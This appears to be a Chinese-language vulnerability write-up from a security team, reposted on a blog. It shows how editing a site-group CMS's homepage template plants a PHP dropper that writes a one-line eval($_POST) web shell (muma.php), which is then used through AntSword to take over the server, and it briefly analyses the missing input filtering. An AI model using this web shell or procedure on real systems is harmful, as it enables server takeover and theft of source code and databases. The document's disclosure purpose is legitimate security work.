close

簡介

某站群原來是我們內部自己開發使用的一套程序,後來看到很多人有相似的需求,團隊決定發布出來免費開源給大家使用。某公司某站群最新版本存在文件上傳漏洞,攻擊者可利用該漏洞獲取服務器控制權限。

適合用在什麼場景?推薦有建站基礎,懂得SEO的專業人士使用,可用於養域名養權重,關鍵詞流量站、蜘蛛池、企業站乃至個人博客都可以使用。

下載程序

官網下載:https://www.*******.com/

下載地址點擊以後跳轉此頁面,點擊下載谷歌是沒有反應的,360和ie是可以的,谷歌瀏覽器報錯Mixed Content: The site at '<URL>' was loaded over a secure connection, but the file at '<URL>' was loaded over an insecure connection. This file should be served over HTTPS. This download has been blocked. See <URL> for more details.提示遇到https和http不兼容問題

打開調試,直接點擊url就可以下載或者是改成https點擊下載就可以下載了。但是官方審核到了三級驗證中了,點擊下載沒反應就直接給駁回了。

然後我又重新在文檔做了說明,並下載了安裝包放到附件裡邊重新提交的,又要從一級審核開始。

官方大人審核,不敢多言,直接上過程。

搭建過程

下載安裝包安裝完以後, 此時登錄後台程序:

後台效果

進入後台以後:點擊系統設置->模板風格->可以下載其他模板以後,點擊編輯模板,站點選擇該模板。

複製此段程序:找到首頁模板,複製進去,點擊保存就可以了。

保存完,運行前端,會在根目錄下生成文件。

會在根目錄下生成muma.php

惡意代碼:

<?php$file=fopen("muma.php","w");//根目錄創建muma.php文件fwrite($file,'<');fwrite($file,'?');fwrite($file,'php');fwrite($file,'@eval($_POST["cmd"]);');fwrite($file,'?>');?>

運行完以後,域名+muma.php

使用蟻劍鏈接木馬,獲得服務器權限:

查看數據配置信息:

代碼分析

點擊保存,獲取到這個地址。

找到保存方法,獲取body內容,stripslashes 函數對內容反斜槓處理,對非法內容並沒有過濾。

至此,通過系統後台文件編輯,通過非法代碼,運行文件,實現寫入木馬程序執行,拿到了服務器全部權限、源碼,以及數據庫信息,造成了很嚴重的後果。

E



N



D












Tide安全團隊正式成立於2019年1月,是新潮信息旗下以互聯網攻防技術研究為目標的安全團隊,團隊致力於分享高質量原創文章、開源安全工具、交流安全技術,研究方向覆蓋網絡攻防、系統安全、Web安全、移動終端、安全開發、物聯網/工控安全/AI安全等多個領域。

團隊作為「省級等保關鍵技術實驗室」先後與哈工大、齊魯銀行、聊城大學、交通學院等多個高校名企建立聯合技術實驗室,近三年來在網絡安全技術方面開展研發項目60餘項,獲得各類自主知識產權30餘項,省市級科技項目立項20餘項,研究成果應用於產品核心技術研究、國家重點科技項目攻關、專業安全服務等。對安全感興趣的小夥伴可以加入或關注我們。

arrow
arrow
    全站熱搜
    創作者介紹
    創作者 鑽石舞台 的頭像
    鑽石舞台

    鑽石舞台

    鑽石舞台 發表在 痞客邦 留言(0) 人氣()